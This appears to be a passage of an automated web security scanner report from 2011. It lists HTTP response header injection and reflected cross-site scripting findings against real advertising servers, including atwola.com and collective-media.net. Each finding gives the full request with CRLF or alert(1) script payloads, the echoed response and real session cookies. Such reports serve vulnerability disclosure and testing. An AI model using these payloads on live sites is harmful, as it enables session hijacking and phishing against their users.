HTTP/1.1 302 Moved Temporarily
Date: Tue, 10 May 2011 13:15:46 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=F072A1362457E9AA019C1C921ECBB27A; Domain=.gather.com; Path=/
Set-Cookie: vis=UpaMeCxC7omqbrijp2KbL/MUIG2sDp6U6nijlaPvAYBKBPTx/gUWgbIx3xlhc5t/wmKSD+84cneR895eDEjeO1sXGWt6WL74rv+kstIq/BM=; Domain=gather.com; Expires=Mon, 05-May-2031 13:15:46 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=V4KohYPrJU2o32JtCv0BQg+EP2KssYlfiyJ3tq9u4afVb7Lwg6CL2XGtuxHWTMN7ATxaIwqStE+O81bnyJBvZGU6xAX4Z9xPZHxrgLEOomdsCTFVTXLkFYJCkaCM+BaP; Domain=gather.com; Expires=Mon, 05-May-2031 13:15:46 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Location: http://www.gather.com/d1c40
da2b4770962

Content-Length: 0
Content-Type: text/html;charset=UTF-8


3.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 2157c%0d%0a832059ca924 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=18303&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=14952 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305562739|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562704; TData=99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|60146|52576|56969|56835|56780|57372|56761; N=2:075830f4860e794d16ad1f8cf1dc6ff2,aff3a0d34f874c485c6aff040641c1902157c%0d%0a832059ca924; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NjA3NDA6NTcxMzA6NTMzODA6NjA0OTA6NjA1MTI6NjA0ODk6NTcxNDk6NjA1MTU6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NjAxNDY6NTI1NzY=; AxData=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:53:31 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Tue, 10 May 2011 14:08:31 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Fri, 04-May-12 13:53:31 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305640411|60130^1^1305560226|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305562739|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562704; path=/; expires=Tue, 17-May-11 13:53:31 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1305035611^1305037411|18303^1305035611^1305037411; path=/; expires=Tue, 10-May-11 14:23:31 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|57094|60740|50085|50086|57130|50963|60491|60512|51186|56281|53380|60489|60515|57149|52615|60490|53656|55401|50507|60506|54255|57144|60509|54243|51182|50961|54209|56419|52576|56969|56835|56780|57372|56761; expires=Fri, 04-May-12 13:53:31 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:aff3a0d34f874c485c6aff040641c1902157c
832059ca924
,e93692b4245f9caf3a3a6cab8d3d53be; expires=Fri, 04-May-12 13:53:31 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTcwOTQ6NjA3NDA6NTAwODU6NTAwODY6NTcxMzA6NTA5NjM6NjA0OTE6NjA1MTI6NTExODY6NTYyODE6NTMzODA6NjA0ODk6NjA1MTU6NTcxNDk6NTI2MTU6NjA0OTA6NTM2NTY6NTU0MDE6NTA1MDc6NjA1MDY6NTQyNTU6NTcxNDQ6NjA1MDk6NTQyNDM6NTExODI6NTA5NjE6NTQyMDk6NTY0MTk6NTI1NzY=; expires=Fri, 04-May-12 13:53:31 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|57094|60740|50085|50086|57130|50963|60491|60512|51186|56281|53380|60489|60515|57149|52615|60490|53656|55401|
...[SNIP]...

3.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload af27a%0d%0a3f3a13db1d1 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=af27a%0d%0a3f3a13db1d1&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=14952 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305562739|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562704; TData=99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|60146|52576|56969|56835|56780|57372|56761; N=2:075830f4860e794d16ad1f8cf1dc6ff2,aff3a0d34f874c485c6aff040641c190; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NjA3NDA6NTcxMzA6NTMzODA6NjA0OTA6NjA1MTI6NjA0ODk6NTcxNDk6NjA1MTU6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NjAxNDY6NTI1NzY=; AxData=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:48:16 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Tue, 10 May 2011 14:03:16 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Fri, 04-May-12 13:48:16 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305640096|60130^1^1305560226|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305562739|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562704; path=/; expires=Tue, 17-May-11 13:48:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1305035296^1305037096|af27a
3f3a13db1d1
^1305035296^1305037096; path=/; expires=Tue, 10-May-11 14:18:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|57094|60740|50085|50086|57130|50963|60491|60512|51186|56281|53380|60489|60515|57149|52615|60490|53656|55401|50507|60506|54255|57144|60509|54243|51182|50961|54209|56419|52576|56969|56835|56780|57372|56761; expires=Fri, 04-May-12 13:48:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:aff3a0d34f874c485c6aff040641c190,e93692b4245f9caf3a3a6cab8d3d53be; expires=Fri, 04-May-12 13:48:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTcwOTQ6NjA3NDA6NTAwODU6NTAwODY6NTcxMzA6NTA5NjM6NjA0OTE6NjA1MTI6NTExODY6NTYyODE6NTMzODA6NjA0ODk6NjA1MTU6NTcxNDk6NTI2MTU6NjA0OTA6NTM2NTY6NTU0MDE6NTA1MDc6NjA1MDY6NTQyNTU6NTcxNDQ6NjA1MDk6NTQyNDM6NTExODI6NTA5NjE6NTQyMDk6NTY0MTk6NTI1NzY=; expires=Fri, 04-May-12 13:48:16 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|57094|60740|50085|50086|57130|50963|60491|60512|51186|56281|53380|60489|60515|57149|52615|60490|53656|55401|
...[SNIP]...

4. Cross-site scripting (reflected)  previous  next
There are 398 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.collective-media.net/ad/q1.philly/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/q1.philly/news

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b6c3<script>alert(1)</script>c99cf9118d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad2b6c3<script>alert(1)</script>c99cf9118d4/q1.philly/news;sz=728x90;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Cookie: JY57=3kJqRfVWIsliNzmh12p72Uiw-sYF7o0ex_JQsPY6aZLx62OOd4kyhMQ; cli=11fda490648f83c; dc=dc; nadp=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Content-Type: text/html
Content-Length: 115
Vary: Accept-Encoding
Date: Tue, 10 May 2011 14:20:06 GMT
Connection: close

unknown path /ad2b6c3<script>alert(1)</script>c99cf9118d4/q1.philly/news;cmw=nurl;sz=728x90;click0=;ord=[timestamp]

4.2. http://a.collective-media.net/adj/idgt.slashgear/article_above [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70ecd'-alert(1)-'b92e5d76854 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.slashgear70ecd'-alert(1)-'b92e5d76854/article_above;sec=article;fold=above;tile=1;sz=728x90;ord=8260554892476648? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 493
Date: Tue, 10 May 2011 13:36:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.slashgear70ecd'-alert(1)-'b92e5d76854/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/idgt.slashgear/article_above [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.slashgear/article_above

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2160e'-alert(1)-'33e66250cd2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.slashgear/article_above2160e'-alert(1)-'33e66250cd2;sec=article;fold=above;tile=1;sz=728x90;ord=8260554892476648? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 493
Date: Tue, 10 May 2011 13:36:21 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:21 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.slashgear/article_above2160e'-alert(1)-'33e66250cd2;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/idgt.slashgear/article_above [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.slashgear/article_above

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c976'-alert(1)-'4e5e9bb4060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;ord=8260554892476648?&7c976'-alert(1)-'4e5e9bb4060=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 497
Date: Tue, 10 May 2011 13:36:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:10 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648?&7c976'-alert(1)-'4e5e9bb4060=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://a.collective-media.net/adj/idgt.slashgear/article_above [sec parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.slashgear/article_above

Issue detail

The value of the sec request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd8ab'-alert(1)-'a2aff8f33cb was submitted in the sec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;ord=8260554892476648?bd8ab'-alert(1)-'a2aff8f33cb HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 494
Date: Tue, 10 May 2011 13:35:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:35:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.slashgear/article_above;sec=article;fold=above;tile=1;sz=728x90;net=idgt;ord=8260554892476648?bd8ab'-alert(1)-'a2aff8f33cb;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.6. http://a.collective-media.net/adj/ns.androidcentral/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb074'-alert(1)-'086f2a8c269 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentralcb074'-alert(1)-'086f2a8c269/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ord=%202250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 491
Date: Tue, 10 May 2011 13:34:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentralcb074'-alert(1)-'086f2a8c269/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.7. http://a.collective-media.net/adj/ns.androidcentral/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd302'-alert(1)-'751a437e7b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/generalcd302'-alert(1)-'751a437e7b3;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ord=%202250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 491
Date: Tue, 10 May 2011 13:34:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:06 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/generalcd302'-alert(1)-'751a437e7b3;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

